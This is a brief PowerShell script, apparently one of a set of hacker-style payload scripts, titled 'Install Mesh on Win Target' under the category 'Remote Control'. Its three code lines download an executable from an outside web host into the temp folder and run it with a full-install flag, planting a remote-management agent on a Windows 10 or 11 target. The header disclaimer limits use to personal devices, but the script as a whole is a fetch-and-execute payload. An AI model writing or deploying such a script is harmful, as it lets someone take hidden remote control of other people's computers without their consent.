20 lines
1.5 KiB
PowerShell
20 lines
1.5 KiB
PowerShell
|
|
##############################################################################################
|
|
# _;~) (~;_ #
|
|
# ( | | ) #
|
|
# Title : Install Mesh on Win Target ~', ', ,''~'', ,' ,'~ #
|
|
# Author : DAProgs ', ',' ',' ,' #
|
|
# Version : 1.0 ',: {'} {'} :,' #
|
|
# Category : Remote Control ; /^\ ; #
|
|
# Target : Windows 10, 11 ~\ ~ /~ #
|
|
# ,' ,~~~~~, ', #
|
|
# My crime is that of curiosity ,' ,' ;~~~; ', ', #
|
|
# ,' ,' ''' ', ', #
|
|
# Use these scripts only for experimenting on your (~ ; ; ~) #
|
|
# personnal devices -;_) (_;- #
|
|
##############################################################################################
|
|
|
|
$outFile = $env:TEMP + '\mesh.exe'
|
|
Start-BitsTransfer -Source "https://www.home.daprogs.net/dl/meshRMM.exe" -Destination $outFile
|
|
Start-Process -FilePath $outFile -ArgumentList ('-fullinstall')
|